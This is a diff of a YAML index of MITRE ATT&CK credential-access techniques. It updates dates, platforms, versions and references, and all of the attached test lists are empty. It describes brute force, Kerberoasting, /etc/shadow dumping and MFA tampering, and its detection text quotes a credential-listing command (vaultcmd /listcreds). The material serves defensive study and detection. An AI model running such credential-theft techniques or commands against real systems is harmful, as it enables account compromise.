       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -48073,6 +48820,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -48091,18 +48839,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -48126,13 +48874,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -48158,6 +48903,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -48169,18 +48915,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -48199,14 +48945,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -48235,24 +48978,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -48287,13 +49032,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -48371,14 +49113,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -48394,6 +49135,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -48402,13 +49144,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -48416,15 +49158,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -48435,9 +49173,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -48483,7 +49220,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -48502,17 +49239,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -48545,10 +49281,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -48585,11 +49320,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -48657,34 +49391,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -48693,20 +49403,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -48738,7 +49470,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -48764,13 +49496,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -48787,24 +49517,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -48845,36 +49575,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -48895,6 +49602,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -48909,52 +49617,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -48976,6 +49674,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -48986,23 +49685,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -49073,9 +49799,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -49134,12 +49859,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -49171,6 +49895,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -49180,7 +49905,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -49192,111 +49916,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
